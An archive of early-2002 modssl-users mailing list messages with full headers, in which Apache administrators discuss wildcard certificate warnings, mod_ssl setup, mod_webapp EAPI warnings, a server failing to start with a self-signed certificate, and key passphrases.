>Subject: RE: wildcard certificate errors? > > >>-----Original Message----- >>From: Rhys Hopkins [mailto:rhys.hopkins@aerotech-eu.com] >>Sent: 26 February 2002 13:26 >>To: 'modssl-users@modssl.org' >>Subject: RE: wildcard certificate errors? >> >> >>I have this problem viewing our site with IE5.5 >>Do all microsoft browsers reject wildcard certs ? >Some reject them entirely, eg IE3, but these are no longer supported. I >trust that you mean IE5.5SP2? > >>Is there a patch for IE5 to get round this problem ? > >You should be able to either disable the warning or click past it. >> >>Why don't Thawte tell you about this when you buy the certificate? >> >The information is there on their site: >http://www.thawte.com/getinfo/products/wildcard/overview.html > >I found this clicking the wildcard certificates link from >www.thawte.com. >Not exactly hidden. There's even a link to creating test >certificates that >you can play with until you get the process right. > >Officialy IE doesn't support wildcard certificates, but other than the >original IE5 refusing them unofficially it does. In fact, there were >enormous bugs with IE5 (pre version 5.01). > >- >John Airey >Internet systems support officer, ITCSD, Royal National >Institute for the >Blind, >Bakewell Road, Peterborough PE2 6XU, >Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 >John.Airey@rnib.org.uk > >Evolution - A crutch for scientists who can't handle the >existence of the >creator. See "disproven scientific theories" and Romans 1:22. > > >>-----Original Message----- >>From: Julian C. Dunn [mailto:jdunn@verticalscope.com] >>Sent: 26 February 2002 13:19 >>To: modssl-users@modssl.org >>Subject: Re: wildcard certificate errors? >> >> >>On Tue, 26 Feb 2002, Matus "fantomas" Uhlar wrote: >> >>> [26/Feb/2002 09:06:59 15055] [warn] Init: (ssl.fantomas.sk:443) RSA >>> server certificate CommonName (CN) *.fantomas.sk' does NOT >>match server >>> name!? >>> >>> I really don't understand this. *.fantomas.sk DOES match >>ssl.fantomas.sk, >>> right? It works but why does it produce warning? >> >>No, it doesn't, because there are no wildcard expansion >>patterns accepted >>on the server end. Wildcard certs only work because the >>_browser_ accepts >>the wildcard in the CN. >> >>In any case the warning you are seeing is only a warning; it's >>not fatal. >> >>- Julian >> >>-- >>Julian C. Dunn, B.A.Sc >>Senior Software Developer, VerticalScope Inc. >>Tel.: (416) 341-8950 x236 Fax: (416) 341-8959 >>WWW: www.verticalscope.com >> >>"Windows NT encountered the following error: >>The operation was completed successfully." >> >> >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org >>______________________________________________________________________ >>Apache Interface to OpenSSL (mod_ssl) www.modssl.org >>User Support Mailing List modssl-users@modssl.org >>Automated List Manager majordomo@modssl.org >> > >- > >NOTICE: The information contained in this email and any attachments is >confidential and may be legally privileged. If you are not the >intended recipient you are hereby notified that you must not use, >disclose, distribute, copy, print or rely on this email's content. If >you are not the intended recipient, please notify the sender >immediately and then delete the email and any attachments from your >system. > >RNIB has made strenuous efforts to ensure that emails and any >attachments generated by its staff are free from viruses. However, it >cannot accept any responsibility for any viruses which are >transmitted. We therefore recommend you scan all attachments. > >Please note that the statements and views expressed in this email >and any attachments are those of the author and do not necessarily >represent those of RNIB. > >RNIB Registered Charity Number: 226227 > >Website: http://www.rnib.org.uk > >14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Tue Feb 26 23:49:28 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id XAA21269; Tue, 26 Feb 2002 23:47:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from sifl.squaretrade.com id XAA21131; Tue, 26 Feb 2002 23:46:12 +0100 (MET) Received: from olly.squaretrade.com ([216.136.185.66] helo=gonzo) by sifl.squaretrade.com with smtp (Exim 3.34 #1 (Debian)) id 16fnxF-0005pf-00 for ; Tue, 26 Feb 2002 12:12:05 -0800 From: "Glen S Mehn" To: Subject: RE: newbie mod_ssl questions Date: Tue, 26 Feb 2002 12:35:23 -0800 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: <200202251918.OAA15342@www20.ureach.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Glen S Mehn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Read the docs at http://modssl.org/docs/ that'll get you started. You'll need to: create a certificate self-sign it (or get thawte, verisign, etc to do so) configure apache for SSL operation restart with SSL support test etc. -glen -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On Behalf Of Eric Webber Sent: Monday, February 25, 2002 11:19 AM To: modssl-users@modssl.org Subject: newbie mod_ssl questions I have a linux box that came with Apache preinstalled and in the httpd.conf there are entries such as LoadModule ssl_module modules/libssl.so which would seem to indicate mod ssl is loaded but when I go to https://myserver.com I get nothing. How can I tell if ssl is really loaded, and what is the best faq to read for my situation, i.e. I have apache 1.3.20 RedHat, OpenSSL version 0.9.6b, on redhat version 2.4.7-10. Is there a simple way to list all my modules that are actually loaded dynamically ? [I know the static command] I want to simply provide ssl encryption of web sessions between known and unknown clients and our webserver. I have attached a copy of my httpd.conf file. warmest regards, Eric Sean Webber ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 04:37:14 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id EAA18731; Wed, 27 Feb 2002 04:34:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from ureach.com id EAA18548; Wed, 27 Feb 2002 04:32:58 +0100 (MET) Received: from www20.ureach.com (www20.ureach.com [172.16.2.48]) by ureach.com (8.9.1/8.8.5) with ESMTP id WAA09834 for ; Tue, 26 Feb 2002 22:25:49 -0500 Received: (from nobody@localhost) by www20.ureach.com (8.9.3/8.9.1) id WAA29205; Tue, 26 Feb 2002 22:25:49 -0500 Date: Tue, 26 Feb 2002 22:25:49 -0500 Message-Id: <200202270325.WAA29205@www20.ureach.com> To: "Glen S Mehn" From: Eric Webber Subject: Re: RE: newbie mod_ssl questions Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-vsuite-type: e Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Eric Webber X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users thanks. it appears to work but only from my a browser on the same box as the server. ________________________________________________ Get your own "800" number Voicemail, fax, email, and a lot more http://www.ureach.com/reg/tag ---- On Tue, 26 Feb 2002, Glen S Mehn (glen@squaretrade.com) wrote: > Read the docs at http://modssl.org/docs/ > > that'll get you started. > > You'll need to: > > create a certificate > self-sign it (or get thawte, verisign, etc to do so) > configure apache for SSL operation > restart with SSL support > test > etc. > > -glen > > -----Original Message----- > From: owner-modssl-users@modssl.org > [mailto:owner-modssl-users@modssl.org]On Behalf Of Eric Webber > Sent: Monday, February 25, 2002 11:19 AM > To: modssl-users@modssl.org > Subject: newbie mod_ssl questions > > > I have a linux box that came with Apache preinstalled and in the > httpd.conf > there are entries such as > > > LoadModule ssl_module modules/libssl.so > > > which would seem to indicate mod ssl is loaded > but when I go to https://myserver.com I get nothing. > How can I tell if ssl is really loaded, and what is the > best faq to read for my situation, i.e. I have apache 1.3.20 RedHat, > OpenSSL version 0.9.6b, on redhat version 2.4.7-10. > Is there a simple way to list all my modules that are actually > loaded dynamically ? [I know the static command] > > > I want to simply provide ssl encryption of web sessions between > known and unknown clients and our webserver. > > I have attached a copy of my httpd.conf file. > > warmest regards, > > > Eric Sean Webber > > > > > > > ________________________________________________ > Get your own "800" number > Voicemail, fax, email, and a lot more > http://www.ureach.com/reg/tag > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 05:53:33 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA26361; Wed, 27 Feb 2002 05:51:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from tsunami.tag.csiro.au id FAA26243; Wed, 27 Feb 2002 05:49:59 +0100 (MET) Received: from structure.tag.csiro.au (mag90.tag.csiro.au [146.118.224.90]) by tsunami.tag.csiro.au (8.9.3+Sun/8.9.1) with ESMTP id XAA22153 for ; Tue, 26 Feb 2002 23:05:30 GMT Received: (from wes@localhost) by structure.tag.csiro.au (SGI-8.9.3/8.9.3) id JAA03396 for modssl-users@modssl.org; Wed, 27 Feb 2002 09:16:35 +1000 (EST) Date: Wed, 27 Feb 2002 09:16:35 +1000 From: Wes Barris To: modssl-users@modssl.org Subject: Re: How to install mod_ssl + mod_webapp? Message-ID: <20020227091635.A3300@structure> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0us In-Reply-To: ; from Michael.Straessle@bk.admin.ch on Tue, Feb 26, 2002 at 09:41:51AM +0100 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Wes Barris X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Tue, Feb 26, 2002 at 09:41:51AM +0100, Michael.Straessle@bk.admin.ch wrote: > i did compile a post-1.1.2 EAPI version of mod_jserv which works fine - and > without warnings - with my configuration (apache 1.3.22/mod_ssl 2.8.5): > > http://www.modssl.org/contrib/mod_jserv-1.1.3-dev-eapi-WIN32.zip Thanks. The mod_webapp binary from jakarta.apache.org seems to be working fine despite the warning about EAPI. > > ...had to set > KeepAlive Off > in httpd.conf however (BUG #569) to get production quality. > > michael > > > -----Ursprungliche Nachricht----- > > Von: Will Guaraldi [mailto:wguaraldi@byallaccounts.com] > > Gesendet: Freitag, 22. Februar 2002 15:36 > > An: modssl-users@modssl.org > > Betreff: RE: How to install mod_ssl + mod_webapp? > > > > > > For the record, we're running Apache 1.3.20/mod_ssl 2.8.4 > > with ApacheJServer > > 1.1.2 and we get the same warning when it loads JServ that > > you get with > > mod_webapp.c and our application works fine. So you might not have to > > recompile the mod_webapp module with -DEAPI. > > > > /will > > > > > -----Original Message----- > > > From: owner-modssl-users@modssl.org > > > [mailto:owner-modssl-users@modssl.org]On Behalf Of Wes Barris > > > Sent: Thursday, February 21, 2002 5:21 PM > > > To: modssl list > > > Subject: How to install mod_ssl + mod_webapp? > > > > > > > > > We are currently using Jakarta-tomcat-4.0.1 with Apache httpd 1.3.22 > > > (binary distributions for linux downloaded from the www.apache.org > > > website). I also have mod_webapp installed (downloaded from the > > > same website). > > > > > > Now, I want to add mod_ssl functionality to this mix. From what I > > > gather from the www.modssl.org website, I must throw away what I > > > have and compile from sources in order to use mod_ssl. > > > > > > I followed the instructions on this page: > > > > > > http://www.modssl.org/example/ > > > > > > and everything seemed to build properly. After copying > > mod_ssl.so to > > > the new ./libexec directory and adding the following two lines to > > > ./conf/httpd.conf: > > > > > > LoadModule webapp_module libexec/mod_webapp.so > > > AddModule mod_webapp.c > > > > > > I get this error message: > > > > > > root@redhat# /usr/local/apache-ssl/bin/apachectl configtest > > > [Wed Feb 20 15:59:04 2002] [warn] Loaded DSO > > > libexec/mod_webapp.so uses plain Apache 1.3 API, this module > > > might crash under EAPI! (please recompile it with -DEAPI) > > > [Wed Feb 20 15:59:04 2002] [warn] module mod_webapp.c is already > > > added, skipping > > > Syntax OK > > > > > > I can read the words but I don't really know what to do. It seems > > > to be saying that I have to compile mod_webapp using -DEAPI. Can > > > anyone provide some guidance? > > > > > > -- > > > Wes Barris > > > E-Mail: Wes.Barris@csiro.au > > > Phone: 07-3346-2504 > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) > www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > > > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org -- Wes Barris E-Mail: Wes.Barris@csiro.au Phone: 07-3346-2504 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 12:40:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA04873; Wed, 27 Feb 2002 12:39:52 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id MAA04811; Wed, 27 Feb 2002 12:38:46 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id AF9F64CE691; Wed, 27 Feb 2002 12:38:45 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1RBc1U78897; Wed, 27 Feb 2002 12:38:01 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cer31mx.cirso.fr id LAA28822; Wed, 27 Feb 2002 11:40:19 +0100 (MET) Received: from cer31mx.cirso.fr (localhost [127.0.0.1]) by cer31mx.cirso.fr (8.11.1/8.11.1) with ESMTP id g1RAf0m27295 for ; Wed, 27 Feb 2002 11:41:00 +0100 Received: from contact31.cirso.fr (contact.cirso.fr [213.41.82.11]) by cer31mx.cirso.fr (8.11.1/8.11.1) with SMTP id g1RAex027279 for ; Wed, 27 Feb 2002 11:41:00 +0100 Received: by contact31.cirso.fr(Lotus SMTP MTA v4.6.7 (934.1 12-30-1999)) id C1256B6D.003AAE27 ; Wed, 27 Feb 2002 11:40:56 +0100 X-Lotus-FromDomain: CER59@CER31@URSSAF From: "Arnaud De Timmerman" To: modssl-users@modssl.org Message-ID: Date: Wed, 27 Feb 2002 11:42:13 +0100 Subject: httpd doesn't start with own certificate Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Arnaud De Timmerman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users hi all, i'm trying to launch an apache ssl server (thanks to "httpd start") with the pretty well known "ssl.crt/server.crt" file, the server starts with no problem, so far so good i've made my own ca, then used this ca to sign a certificate request, giving me a new certificate file (i use the appropriate key as well) when i try to launch the server with the new certificate and key files it justs say nothing, but doesn't start, and the SSLLog file is created but still 0 sized so i don't know what i'm doing wrong my httpd.conf file contains **************** SSLEngine on SSLLog /var/log/httpd/ssl_engine.log SSLLogLevel warn SSLCertificateFile /path/to/newserver.crt SSLCertificateKeyFile /path/to/newserver.key **************** infos in my newserver.crt file are : **************** Certificate: Data: Version: 3 (0x2) Serial Number: 73 (0x49) Signature Algorithm: md5WithRSAEncryption Issuer: C=FR, ST=root, L=root, O=root, OU=root, CN=root/Email=root@root.fr Validity Not Before: Feb 27 07:20:36 2002 GMT Not After : Oct 19 07:20:36 2026 GMT Subject: C=FR, ST=state, L=local, O=orga, OU=unit, CN=www.test.fr/Email=root@test.fr Subject Public Key Info: Public Key Algorithm: rsaEncryption RSA Public Key: (1024 bit) Modulus (1024 bit): 00:b7:19:bc:a4:1d:41:9f:a1:4d:95:d8:f3:3a:11: 9d:c7:4d:81:29:36:1b:04:a4:f7:2d:c1:6b:ef:14: 2d:f4:81:54:7b:1d:91:04:ee:16:5e:1c:3c:1f:d1: 77:20:9d:41:f9:9e:ed:40:a1:df:11:69:35:e3:ad: 05:c7:28:3c:18:6b:2d:3a:1d:e0:36:8f:4d:a5:c4: a6:be:77:25:df:75:fc:45:79:c2:6d:d7:e0:5b:5b: 65:17:3b:50:53:7d:c7:fc:e7:87:20:14:d2:27:93: 72:14:7e:82:d9:dc:b8:d6:87:b2:df:38:41:c8:74: e2:43:26:09:ca:d5:ca:3b:e1 Exponent: 65537 (0x10001) X509v3 extensions: X509v3 Subject Alternative Name: email:root@test.fr Netscape Comment: Comment Netscape Cert Type: SSL Server Signature Algorithm: md5WithRSAEncryption 69:f5:08:f1:bc:7c:d7:28:7a:bf:a7:2b:ca:56:d5:42:a9:3b: e4:53:b3:50:61:8b:c9:b1:93:a4:17:b1:6c:bf:73:60:db:eb: c4:f7:ec:5a:c5:b3:3c:6b:69:63:08:f7:04:f3:2f:4d:b1:91: 02:dd:93:b1:8f:fc:77:fb:ce:cc:d8:15:26:89:fb:12:0c:fe: 98:be:25:53:e0:f4:b0:12:82:2e:86:4f:86:82:a6:8f:c5:36: 4b:e9:77:69:ea:e5:17:10:50:5a:f3:d3:15:72:03:e6:de:c9: 47:b8:d7:e6:84:f6:e5:4a:c5:2b:46:9f:3e:33:da:a3:c5:04: 90:32 Certificate purposes: SSL client : No SSL client CA : No SSL server : Yes SSL server CA : No Netscape SSL server : Yes Netscape SSL server CA : No S/MIME signing : No S/MIME signing CA : No S/MIME encryption : No S/MIME encryption CA : No CRL signing : Yes CRL signing CA : No **************** please tell me if something in the DN of the issuer or the subject, or in the purposes of this certificate makes that it has no chance to be accepted by apache many thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 12:55:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id MAA06214; Wed, 27 Feb 2002 12:54:51 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from mail.vandemataram.com id MAA06153; Wed, 27 Feb 2002 12:53:53 +0100 (MET) From: anand@vandemataram.com Received: (qmail 9182 invoked from network); 27 Feb 2002 02:05:05 -0000 Received: from unknown (HELO vandemataram.com) (127.0.0.1) by 127.0.0.1 with SMTP; 27 Feb 2002 02:05:05 -0000 Received: from 61.11.16.68 (SquirrelMail authenticated user anand) by mail.vandemataram.com with HTTP; Tue, 26 Feb 2002 21:05:05 -0500 (EST) Message-ID: <40719.61.11.16.68.1014775505.squirrel@mail.vandemataram.com> Date: Tue, 26 Feb 2002 21:05:05 -0500 (EST) Subject: Re: httpd doesn't start with own certificate To: modssl-users@modssl.org In-Reply-To: References: X-Mailer: SquirrelMail (version 0.5) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: anand@vandemataram.com X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, r u using the same server key with generated certificate? also test the path where you placed (regenerated) certificate. agd > > > hi all, > > i'm trying to launch an apache ssl server (thanks to "httpd start") > with the pretty well known "ssl.crt/server.crt" file, the server starts with no > problem, so far so good > > i've made my own ca, then used this ca to sign a certificate request, giving me > a new certificate file (i use the appropriate key as well) > > when i try to launch the server with the new certificate and key files it justs > say nothing, but doesn't start, and the SSLLog file is created but still 0 sized > so i don't know what i'm doing wrong > > my httpd.conf file contains > > **************** > SSLEngine on > SSLLog /var/log/httpd/ssl_engine.log > SSLLogLevel warn > SSLCertificateFile /path/to/newserver.crt > SSLCertificateKeyFile /path/to/newserver.key > **************** > > infos in my newserver.crt file are : > > **************** > Certificate: > Data: > Version: 3 (0x2) > Serial Number: 73 (0x49) > Signature Algorithm: md5WithRSAEncryption > Issuer: C=FR, ST=root, L=root, O=root, OU=root, > CN=root/Email=root@root.fr > Validity > Not Before: Feb 27 07:20:36 2002 GMT > Not After : Oct 19 07:20:36 2026 GMT > Subject: C=FR, ST=state, L=local, O=orga, OU=unit, > CN=www.test.fr/Email=root@test.fr > Subject Public Key Info: > Public Key Algorithm: rsaEncryption > RSA Public Key: (1024 bit) > Modulus (1024 bit): > 00:b7:19:bc:a4:1d:41:9f:a1:4d:95:d8:f3:3a:11: > 9d:c7:4d:81:29:36:1b:04:a4:f7:2d:c1:6b:ef:14: > 2d:f4:81:54:7b:1d:91:04:ee:16:5e:1c:3c:1f:d1: > 77:20:9d:41:f9:9e:ed:40:a1:df:11:69:35:e3:ad: > 05:c7:28:3c:18:6b:2d:3a:1d:e0:36:8f:4d:a5:c4: > a6:be:77:25:df:75:fc:45:79:c2:6d:d7:e0:5b:5b: > 65:17:3b:50:53:7d:c7:fc:e7:87:20:14:d2:27:93: > 72:14:7e:82:d9:dc:b8:d6:87:b2:df:38:41:c8:74: > e2:43:26:09:ca:d5:ca:3b:e1 > Exponent: 65537 (0x10001) > X509v3 extensions: > X509v3 Subject Alternative Name: > email:root@test.fr > Netscape Comment: > Comment > Netscape Cert Type: > SSL Server > Signature Algorithm: md5WithRSAEncryption > 69:f5:08:f1:bc:7c:d7:28:7a:bf:a7:2b:ca:56:d5:42:a9:3b: > e4:53:b3:50:61:8b:c9:b1:93:a4:17:b1:6c:bf:73:60:db:eb: > c4:f7:ec:5a:c5:b3:3c:6b:69:63:08:f7:04:f3:2f:4d:b1:91: > 02:dd:93:b1:8f:fc:77:fb:ce:cc:d8:15:26:89:fb:12:0c:fe: > 98:be:25:53:e0:f4:b0:12:82:2e:86:4f:86:82:a6:8f:c5:36: > 4b:e9:77:69:ea:e5:17:10:50:5a:f3:d3:15:72:03:e6:de:c9: > 47:b8:d7:e6:84:f6:e5:4a:c5:2b:46:9f:3e:33:da:a3:c5:04: > 90:32 > Certificate purposes: > SSL client : No > SSL client CA : No > SSL server : Yes > SSL server CA : No > Netscape SSL server : Yes > Netscape SSL server CA : No > S/MIME signing : No > S/MIME signing CA : No > S/MIME encryption : No > S/MIME encryption CA : No > CRL signing : Yes > CRL signing CA : No > **************** > > please tell me if something in the DN of the issuer or the subject, or in the > purposes of this certificate makes that it has no chance to be accepted by > apache > > many thanks > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > ---------------------------------------- VandeMataram.com 2001-2002. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 13:41:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA10612; Wed, 27 Feb 2002 13:39:22 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from cer31mx.cirso.fr id NAA10437; Wed, 27 Feb 2002 13:37:40 +0100 (MET) Received: from cer31mx.cirso.fr (localhost [127.0.0.1]) by cer31mx.cirso.fr (8.11.1/8.11.1) with ESMTP id g1RCcIm01296 for ; Wed, 27 Feb 2002 13:38:18 +0100 Received: from contact31.cirso.fr (contact.cirso.fr [213.41.82.11]) by cer31mx.cirso.fr (8.11.1/8.11.1) with SMTP id g1RCcH001278; Wed, 27 Feb 2002 13:38:17 +0100 Received: by contact31.cirso.fr(Lotus SMTP MTA v4.6.7 (934.1 12-30-1999)) id C1256B6D.00456A03 ; Wed, 27 Feb 2002 13:38:11 +0100 X-Lotus-FromDomain: CER59@CER31@URSSAF From: "Arnaud De Timmerman" To: anand@vandemataram.com cc: modssl-users@modssl.org Message-ID: Date: Wed, 27 Feb 2002 13:39:14 +0100 Subject: =?iso-8859-1?Q?R=E9f._:_Re:_httpd_doesn't_start_with_own_certific?= =?iso-8859-1?Q?ate?= Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Arnaud De Timmerman" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi, >r u using the same server key with generated certificate? also test the path where you placed (regenerated) certificate. i use the new i've created for the new certificate, and the path is correct in the httpd.conf do i have to give specials access to these both files ? 400 ? 644 ? something else ? i there a way to know why the server doesn't start ? do i have to add something in the httpd.conf ? thanks ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 14:58:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA17832; Wed, 27 Feb 2002 14:58:01 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from pladesigns.com id OAA17756; Wed, 27 Feb 2002 14:57:15 +0100 (MET) Received: from merlin.pladesigns.com [172.25.190.2] by pladesigns.com [63.105.23.195] with SMTP (MDaemon.v3.5.7.R) for ; Wed, 27 Feb 2002 05:57:05 -0800 Received: FROM cairo.pladesigns.com BY merlin.pladesigns.com ; Wed Feb 27 05:57:03 2002 -0800 Received: by CAIRO with Internet Mail Service (5.5.2448.0) id ; Wed, 27 Feb 2002 05:39:38 -0800 Message-ID: <91FBD0B430EFD5118B930060672D982C0D00@CAIRO> From: David Buerer To: modssl-users@modssl.org Subject: Documentation Suggestion - mod_ssl compilation - wish list Date: Wed, 27 Feb 2002 05:39:38 -0800 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain X-MDRemoteIP: 172.25.190.2 X-Return-Path: David@pladesigns.com X-MDaemon-Deliver-To: modssl-users@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Buerer X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users If anyone is ever looking for a documentation project, I've got one for you: Tell us how to compile in a Windows environment mod_ssl. The existing doc talks about the make files, how to use the, what to do, but quite frankly that's about one step beyond where I'm at. I'm affluent in many programming languages, but much to my dismay, C is not one of them. I've been too busy keeping up on the other languages to learn a new one. I need someone to tell me step by step what to download, where to get it, how to install it, and how to make it work. At some point I'm going to have to just bite the bullet anyway, but probably not today. Like now since there's a newer version of mod_ssl than I can find a binary for.) Please, I'm not trying to start a NT vs. Linux/Unix debate. There's already enough of those going on and this list isn't the place for it. The fact of the matter is that I'm really stuck with NT. So are a lot of us. I know I put myself at risk of coming across ignorant (well, okay, it's true...I don't know everything) but I figure that I'm not the only one out here with these problems. So, if anyone, anytime, has time to help, that would be great. David ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Feb 27 20:38:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA23961; Wed, 27 Feb 2002 20:36:12 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.inorth.com id UAA23833; Wed, 27 Feb 2002 20:34:49 +0100 (MET) Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19) id ; Wed, 27 Feb 2002 14:34:47 -0500 Message-ID: From: Henning Sittler To: "'modssl-users@modssl.org'" Subject: csr password Date: Wed, 27 Feb 2002 14:34:46 -0500 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C1BFC5.CFE023C0" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Henning Sittler X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This message is in MIME format. Since your mail reader does not understand this format, some or all of this message may not be legible. ------_=_NextPart_001_01C1BFC5.CFE023C0 Content-Type: text/plain; charset="iso-8859-1" I setup a secure server with a password on the csr that must be entered when apache starts up. How can I remove this password so that apache can start without asking for it? Do I need to generate a new key pair? If I do, will that invalidate my current issued certificate? Thanks, Henning Sittler www.inscriber.com ------_=_NextPart_001_01C1BFC5.CFE023C0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable csr password

I setup a secure server with a password on the csr = that must be entered when apache starts up.  How can I remove this = password so that apache can start without asking for it?

Do I need to generate a new key pair?  If I do, = will that invalidate my current issued certificate?

Thanks,



Henning Sittler
www.inscriber.com

